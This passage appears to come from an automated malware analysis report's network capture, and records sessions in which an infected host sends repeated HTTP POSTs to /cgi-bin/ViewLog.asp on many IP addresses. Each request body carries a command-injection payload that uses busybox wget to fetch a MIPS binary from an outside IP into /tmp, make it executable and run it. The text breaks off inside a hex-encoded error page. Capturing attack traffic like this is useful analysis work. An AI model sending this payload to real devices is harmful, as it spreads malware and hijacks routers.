                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:30.055988073 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:36.199696064 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:48.231225967 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.574254990 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:02.724092960 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              104192.168.2.144806231.136.255.2068080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:26.881758928 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:30.055972099 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:36.199688911 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:48.231223106 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.574265003 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:02.724041939 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              105192.168.2.143859494.122.204.888080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:26.926898956 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              106192.168.2.144069485.69.26.868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:27.058381081 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:27.592075109 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:28.680048943 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:30.823916912 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:35.175812006 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:43.879373074 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:01.286709070 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:36.101248026 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              107192.168.2.143660095.85.214.1208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:27.134361029 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:27.372961044 CET163INHTTP/1.1 302 Found
                                              Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              108192.168.2.145243294.121.148.518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:27.154519081 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              109192.168.2.144813462.151.181.1188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:27.820638895 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:27.952981949 CET1229INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 1026
                                              Date: Thu, 23 Nov 2023 04:15:27 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 31 31 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 3e 3c 2f 64 69 76 3e 3c 70 3e 3c 62 3e 74 79 